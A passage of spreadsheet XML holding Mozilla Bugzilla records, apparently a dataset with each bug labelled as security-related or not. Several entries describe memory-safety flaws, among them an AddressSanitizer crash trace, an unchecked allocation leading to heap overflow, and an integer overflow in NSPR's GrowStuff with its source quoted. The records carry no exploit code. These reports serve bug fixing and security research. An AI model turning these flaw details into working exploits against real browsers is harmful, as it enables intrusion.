    #23 0x7faa7bbd1760 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&amp;) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
    #24 0x7faa7bbd4f8b in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3
    #25 0x7faa7bb3d3e2 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3
    #26 0x7faa7baaf3a9 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7
    #27 0x7faa7b8b0c3c in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9258:3
    #28 0x7faa7b8c45c4 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9431:24
    #29 0x7faa7b8c3464 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4233:11
    #30 0x7faa7b835144 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
    #31 0x7faa7b843495 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
    #32 0x7faa7b843164 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:327:5
    #33 0x7faa7b8457d3 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
    #34 0x7faa7b8457d3 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
    #35 0x7faa7b8451b4 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:544:9
    #36 0x7faa7c0bac14 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:5
    #37 0x7faa761e1718 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:160:20
    #38 0x7faa75e6cba3 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1425:16
    #39 0x7faa75db3bc0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1795:14
    #40 0x7faa75db00fc in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:17
    #41 0x7faa75db2734 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1603:5
    #42 0x7faa75db2d7e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1636:5
    #43 0x7faa74fa9f59 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #44 0x7faa74fa6850 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #45 0x7faa75dbbac4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
    #46 0x7faa75d2cc38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #47 0x7faa75d2cc38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #48 0x7faa75d2cc38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #49 0x7faa7b1644ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #50 0x7faa7e96a997 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:852:12
    #51 0x7faa75d2cc38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #52 0x7faa75d2cc38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #53 0x7faa75d2cc38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #54 0x7faa7e96a47c in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:684:7
    #55 0x4e00c6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #56 0x4e00c6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #57 0x7faa9034c82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #58 0x41c2e8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c2e8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:313:21 in ClearBidiControls
==7498==ABORTING</t>
        </is>
      </c>
      <c r="X3261" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3262">
      <c r="A3262" t="n">
        <v>680840</v>
      </c>
      <c r="B3262" t="inlineStr">
        <is>
          <t>2011-08-22 00:01:05 -0700</t>
        </is>
      </c>
      <c r="C3262" t="inlineStr">
        <is>
          <t>GrowAtomTable() return code not checked</t>
        </is>
      </c>
      <c r="D3262" t="inlineStr">
        <is>
          <t>2012-01-19 10:42:22 -0800</t>
        </is>
      </c>
      <c r="E3262" t="n">
        <v>1</v>
      </c>
      <c r="F3262" t="n">
        <v>1</v>
      </c>
      <c r="G3262" t="n">
        <v>3</v>
      </c>
      <c r="H3262" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3262" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3262" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3262" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3262" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3262" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3262" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3262" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3262" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q3262" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3262" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3262" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T3262" t="n">
        <v>1</v>
      </c>
      <c r="U3262" t="n">
        <v>0</v>
      </c>
      <c r="V3262" t="n">
        <v>22</v>
      </c>
      <c r="W3262" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #665934 +++
We fixed the code issue from the first paragraph of bug 665934 comment 1 but did NOT fix "the real issue" from the second paragraph of that comment (as well as the bug summary) -- the return value of GrowAtomTable() is still not checked. If malloc/realloc fails (they can!) then later code does stupid unsafe things.
First, GrowAtomTable() returns 0 for "good", -1 for "bad". Other int-returning functions (the various Init functions, for example) use 0 for bad and 1 for good. If it were checked this inconsistency is going to trip someone up.
  -&gt; make GrowAtomTable() return 0 for failure, 1 for success.
  [InitPreProcessor() in cppstruct.c converts the InitAtomTable() return
  value into the opposite sense: 0 for success. Every other function
  in cppstruct.c returns 1 for success and 0 for failure]
InitAtomTable() checks the allocation of atable-&gt;amap instead of the GrowAtomTable return code, but it's possible that the amap allocation succeeded and the arev allocation failed. It also may be possible that there's already an allocated table when IncreaseHashTableSize() calls InitAtomTable, and if the realloc fails then the original amap would be in place.
634     GrowAtomTable(atable, INIT_ATOM_TABLE_SIZE);
635     if (!atable-&gt;amap)
636         return 0;
rewrite as 
        if (!GrowAtomTable(atable, INIT_ATOM_TABLE_SIZE))
            return 0;
       NB: I'm assuming you've swapped the return code as mentioned above
If GrowAtomTable() fails inside AllocateAtom() then it'll start overwriting past the end of the allocated amap and arev buffers. Not sure what you should do if it does fail, maybe return 0 as the atom number? The problem is that all the callers of LookUpAddString (the only caller of AllocateAtom) simply assume success.
Is there anything keeping a lid on nextFree or do we need to worry about integer overflow in GrowAtomTable(atable, atable-&gt;nextFree*2) ? There's further multiplication by sizeof(int) inside GrowAtomTable so we'd need a bit more than 500 Million atoms to overflow.
Similar heap overflow and maybe integer overflow potential in AddAtomFixed</t>
        </is>
      </c>
      <c r="X3262" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3263">
      <c r="A3263" t="n">
        <v>273458</v>
      </c>
      <c r="B3263" t="inlineStr">
        <is>
          <t>2004-12-06 16:26:05 -0800</t>
        </is>
      </c>
      <c r="C3263" t="inlineStr">
        <is>
          <t>crash in [@ nsHTMLReflowState::GetContainingBlockFor ] on CTRL+END</t>
        </is>
      </c>
      <c r="D3263" t="inlineStr">
        <is>
          <t>2006-03-12 18:12:01 -0800</t>
        </is>
      </c>
      <c r="E3263" t="n">
        <v>1</v>
      </c>
      <c r="F3263" t="n">
        <v>1</v>
      </c>
      <c r="G3263" t="n">
        <v>3</v>
      </c>
      <c r="H3263" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3263" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3263" t="inlineStr">
        <is>
          <t>DOM: CSS Object Model</t>
        </is>
      </c>
      <c r="K3263" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3263" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3263" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3263" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3263" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3263" t="inlineStr"/>
      <c r="Q3263" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3263" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3263" t="inlineStr">
        <is>
          <t>mozilla1.8alpha6</t>
        </is>
      </c>
      <c r="T3263" t="n">
        <v>1</v>
      </c>
      <c r="U3263" t="n">
        <v>0</v>
      </c>
      <c r="V3263" t="n">
        <v>27</v>
      </c>
      <c r="W3263" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a6) Gecko/20041203
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a6) Gecko/20041203
Sometimes, and only sometimes, Composer crashes if I CTRL+END. I haven't found
any other pattern yet.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X3263" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3264">
      <c r="A3264" t="n">
        <v>635852</v>
      </c>
      <c r="B3264" t="inlineStr">
        <is>
          <t>2011-02-22 02:33:23 -0800</t>
        </is>
      </c>
      <c r="C3264" t="inlineStr">
        <is>
          <t>Investigate if PresShell::GetCurrentEventFrame() should check that mCurrentEventContent's ownerDoc == mDocument</t>
        </is>
      </c>
      <c r="D3264" t="inlineStr">
        <is>
          <t>2013-11-25 13:27:19 -0800</t>
        </is>
      </c>
      <c r="E3264" t="n">
        <v>1</v>
      </c>
      <c r="F3264" t="n">
        <v>1</v>
      </c>
      <c r="G3264" t="n">
        <v>3</v>
      </c>
      <c r="H3264" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3264" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3264" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3264" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3264" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3264" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3264" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3264" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3264" t="inlineStr">
        <is>
          <t>[sg:audit] [testcase in bug 817219][adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q3264" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3264" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3264" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T3264" t="n">
        <v>1</v>
      </c>
      <c r="U3264" t="n">
        <v>0</v>
      </c>
      <c r="V3264" t="n">
        <v>64</v>
      </c>
      <c r="W3264" t="inlineStr">
        <is>
          <t>...otherwise mCurrentEventFrame may start to point to an object in wrong
presshell if someone manages to move mCurrentEventContent to another document
and then call PresShell::GetCurrentEventFrame().</t>
        </is>
      </c>
      <c r="X3264" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3265">
      <c r="A3265" t="n">
        <v>504021</v>
      </c>
      <c r="B3265" t="inlineStr">
        <is>
          <t>2009-07-13 21:45:21 -0700</t>
        </is>
      </c>
      <c r="C3265" t="inlineStr">
        <is>
          <t>Arbitrary code execution with Firebug XMLHttpRequestSpy</t>
        </is>
      </c>
      <c r="D3265" t="inlineStr">
        <is>
          <t>2010-05-09 15:45:39 -0700</t>
        </is>
      </c>
      <c r="E3265" t="n">
        <v>1</v>
      </c>
      <c r="F3265" t="n">
        <v>1</v>
      </c>
      <c r="G3265" t="n">
        <v>3</v>
      </c>
      <c r="H3265" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3265" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3265" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3265" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3265" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3265" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3265" t="inlineStr">
        <is>
          <t>[sg:critical][firebug-blocks] hold advisory until 3.0.19</t>
        </is>
      </c>
      <c r="Q3265" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3265" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3265" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T3265" t="n">
        <v>1</v>
      </c>
      <c r="U3265" t="n">
        <v>0</v>
      </c>
      <c r="V3265" t="n">
        <v>65</v>
      </c>
      <c r="W3265" t="inlineStr">
        <is>
          <t>spy.js:
top.XMLHttpRequestSpy.prototype =
{
    attach: function()
    {
        ...
        this.onreadystatechange = this.xhrRequest.onreadystatechange;
When accessing this.xhrRequest.onreadystatechange, content functions 
(QueryInterface, getInterfaces, etc.) can be called.</t>
        </is>
      </c>
      <c r="X3265" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3266">
      <c r="A3266" t="n">
        <v>650598</v>
      </c>
      <c r="B3266" t="inlineStr">
        <is>
          <t>2011-04-16 23:24:51 -0700</t>
        </is>
      </c>
      <c r="C3266" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.0.14</t>
        </is>
      </c>
      <c r="D3266" t="inlineStr">
        <is>
          <t>2012-01-07 07:36:31 -0800</t>
        </is>
      </c>
      <c r="E3266" t="n">
        <v>1</v>
      </c>
      <c r="F3266" t="n">
        <v>1</v>
      </c>
      <c r="G3266" t="n">
        <v>2</v>
      </c>
      <c r="H3266" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3266" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3266" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K3266" t="inlineStr">
        <is>
          <t>SeaMonkey 2.0 Branch</t>
        </is>
      </c>
      <c r="L3266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3266" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3266" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3266" t="inlineStr"/>
      <c r="Q3266" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3266" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3266" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3266" t="n">
        <v>1</v>
      </c>
      <c r="U3266" t="n">
        <v>0</v>
      </c>
      <c r="V3266" t="n">
        <v>2</v>
      </c>
      <c r="W3266" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #614274 +++</t>
        </is>
      </c>
      <c r="X3266" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3267">
      <c r="A3267" t="n">
        <v>920011</v>
      </c>
      <c r="B3267" t="inlineStr">
        <is>
          <t>2013-09-24 06:26:50 -0700</t>
        </is>
      </c>
      <c r="C3267" t="inlineStr">
        <is>
          <t>[User Story] Dialing from call log</t>
        </is>
      </c>
      <c r="D3267" t="inlineStr">
        <is>
          <t>2015-03-17 01:26:46 -0700</t>
        </is>
      </c>
      <c r="E3267" t="n">
        <v>1</v>
      </c>
      <c r="F3267" t="n">
        <v>1</v>
      </c>
      <c r="G3267" t="n">
        <v>6</v>
      </c>
      <c r="H3267" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3267" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3267" t="inlineStr">
        <is>
          <t>Gaia::Dialer</t>
        </is>
      </c>
      <c r="K3267" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3267" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3267" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3267" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3267" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3267" t="inlineStr">
        <is>
          <t>[ucid:Comms32, 2.0, ft:comms]</t>
        </is>
      </c>
      <c r="Q3267" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3267" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3267" t="inlineStr">
        <is>
          <t>2.0 S2 (23may)</t>
        </is>
      </c>
      <c r="T3267" t="n">
        <v>1</v>
      </c>
      <c r="U3267" t="n">
        <v>0</v>
      </c>
      <c r="V3267" t="n">
        <v>55</v>
      </c>
      <c r="W3267" t="inlineStr">
        <is>
          <t>User Story:
As a user I want to click on call log and directly dial back.
Acceptance Criteria:
AC 1: I don't want to be presented with users detailed contact view and then select call.
AC 2: I want to be able to dial the number that is in the call log and I am not asked to choose a number to dial back.
AC 3: I do want a good way to manage not accidentally dialing entries from call log</t>
        </is>
      </c>
      <c r="X3267" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3268">
      <c r="A3268" t="n">
        <v>699598</v>
      </c>
      <c r="B3268" t="inlineStr">
        <is>
          <t>2011-11-03 14:56:30 -0700</t>
        </is>
      </c>
      <c r="C3268" t="inlineStr">
        <is>
          <t>Can't search for users across multiple search terms</t>
        </is>
      </c>
      <c r="D3268" t="inlineStr">
        <is>
          <t>2013-05-20 16:10:37 -0700</t>
        </is>
      </c>
      <c r="E3268" t="n">
        <v>1</v>
      </c>
      <c r="F3268" t="n">
        <v>1</v>
      </c>
      <c r="G3268" t="n">
        <v>5</v>
      </c>
      <c r="H3268" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3268" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J3268" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K3268" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3268" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3268" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3268" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3268" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3268" t="inlineStr">
        <is>
          <t>[UX]</t>
        </is>
      </c>
      <c r="Q3268" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3268" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3268" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3268" t="n">
        <v>1</v>
      </c>
      <c r="U3268" t="n">
        <v>0</v>
      </c>
      <c r="V3268" t="n">
        <v>7</v>
      </c>
      <c r="W3268" t="inlineStr">
        <is>
          <t>Users should be able to search for people that match multiple groups. Right now, folks can only search for a single group.</t>
        </is>
      </c>
      <c r="X3268" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3269">
      <c r="A3269" t="n">
        <v>1434153</v>
      </c>
      <c r="B3269" t="inlineStr">
        <is>
          <t>2018-01-29 17:24:33 -0800</t>
        </is>
      </c>
      <c r="C3269" t="inlineStr">
        <is>
          <t>Tab close buttons no longer visible with Touch density UI</t>
        </is>
      </c>
      <c r="D3269" t="inlineStr">
        <is>
          <t>2018-02-01 09:31:02 -0800</t>
        </is>
      </c>
      <c r="E3269" t="n">
        <v>1</v>
      </c>
      <c r="F3269" t="n">
        <v>1</v>
      </c>
      <c r="G3269" t="n">
        <v>2</v>
      </c>
      <c r="H3269" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3269" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3269" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K3269" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3269" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3269" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3269" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3269" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3269" t="inlineStr"/>
      <c r="Q3269" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3269" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3269" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3269" t="n">
        <v>1</v>
      </c>
      <c r="U3269" t="n">
        <v>0</v>
      </c>
      <c r="V3269" t="n">
        <v>6</v>
      </c>
      <c r="W3269" t="inlineStr">
        <is>
          <t>Tab close buttons no longer visible with Touch density UI. Began with today's Nightly.
Built from https://hg.mozilla.org/mozilla-central/rev/117e0c0d1ebe2cf5bdffc3474744add2416fc511</t>
        </is>
      </c>
      <c r="X3269" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3270">
      <c r="A3270" t="n">
        <v>1174015</v>
      </c>
      <c r="B3270" t="inlineStr">
        <is>
          <t>2015-06-11 16:10:40 -0700</t>
        </is>
      </c>
      <c r="C3270" t="inlineStr">
        <is>
          <t>Overflow in prprf/GrowStuff can cause memory-safety bug</t>
        </is>
      </c>
      <c r="D3270" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:20 -0700</t>
        </is>
      </c>
      <c r="E3270" t="n">
        <v>1</v>
      </c>
      <c r="F3270" t="n">
        <v>1</v>
      </c>
      <c r="G3270" t="n">
        <v>3</v>
      </c>
      <c r="H3270" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3270" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J3270" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K3270" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3270" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3270" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3270" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3270" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3270" t="inlineStr">
        <is>
          <t>[post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3270" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3270" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3270" t="inlineStr">
        <is>
          <t>4.12</t>
        </is>
      </c>
      <c r="T3270" t="n">
        <v>1</v>
      </c>
      <c r="U3270" t="n">
        <v>0</v>
      </c>
      <c r="V3270" t="n">
        <v>26</v>
      </c>
      <c r="W3270" t="inlineStr">
        <is>
          <t>GrowStuff (38.0.1\nsprpub\pr\src\io\prprf.c) can cause an overflow if the size of the existing buffer in units of bytes (maxlen) + the size of the string to be appended (len) &gt; 0xffffffff. In this case, the function either allocates a tiny buffer or doesn't even attempt to allocate one large enough, then writes the new string beyond the buffer's end.
1081: static int GrowStuff(SprintfState *ss, const char *sp, PRUint32 len)
1082: {
1083:     ptrdiff_t off;
1084:     char *newbase;
1085:     PRUint32 newlen;
1086: 
1087:     off = ss-&gt;cur - ss-&gt;base;
1088:     if (off + len &gt;= ss-&gt;maxlen) {
1089:        /* Grow the buffer */
1090:        newlen = ss-&gt;maxlen + ((len &gt; 32) ? len : 32);
1091:        if (ss-&gt;base) {
1092:            newbase = (char*) PR_REALLOC(ss-&gt;base, newlen);
1093:        } else {
1094:            newbase = (char*) PR_MALLOC(newlen);
1095:        }
1096:        if (!newbase) {
1097:            /* Ran out of memory */
1098:            return -1;
1099:        }
1100:        ss-&gt;base = newbase;
1101:        ss-&gt;maxlen = newlen;
1102:        ss-&gt;cur = ss-&gt;base + off;
1103:     }
1104: 
1105:     /* Copy data */
1106:     while (len) {
1107:        --len;
1108:        *ss-&gt;cur++ = *sp++;
...
On 32-bit platforms, line 1088 can overflow. In that case, the code doesn't allocate a new buffer, but instead writes the new data beginning just beyond the end of the existing one. Presumably this can occur only if a caller attempts to write a single very long string, because otherwise the system would run out of memory.
On 64-bit platforms, line 1088 doesn't overflow (because ptrdiff_t isa signed 64-bit int), but line 1090 does. In that case, the code allocates a buffer that is much too small, then writes the new data far beyond its end.
The functions that use GrowStuff (PR_vsmprintf and PR_vsprintf_append in prptr.c) are used in several places, but I don't know whether any of the callers ultimately derive potentially very long strings from untrusted sources.
[BTW, I notice that the new Bugzilla doesn't handle pasting of long lines as gracefully as the old one].</t>
        </is>
      </c>
      <c r="X3270" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3271">
      <c r="A3271" t="n">
        <v>1020008</v>
      </c>
      <c r="B3271" t="inlineStr">
        <is>
          <t>2014-06-03 17:14:25 -0700</t>
        </is>
      </c>
      <c r="C3271" t="inlineStr">
        <is>
          <t>Out-of-bounds read in gfxPlatform::GetPrefLangName</t>
        </is>
      </c>
      <c r="D3271" t="inlineStr">
        <is>
          <t>2018-07-06 11:49:47 -0700</t>
        </is>
      </c>
      <c r="E3271" t="n">
        <v>1</v>
      </c>
      <c r="F3271" t="n">
        <v>1</v>
      </c>
      <c r="G3271" t="n">
        <v>3</v>
      </c>
      <c r="H3271" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3271" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3271" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K3271" t="inlineStr">
        <is>
          <t>Trunk</t>
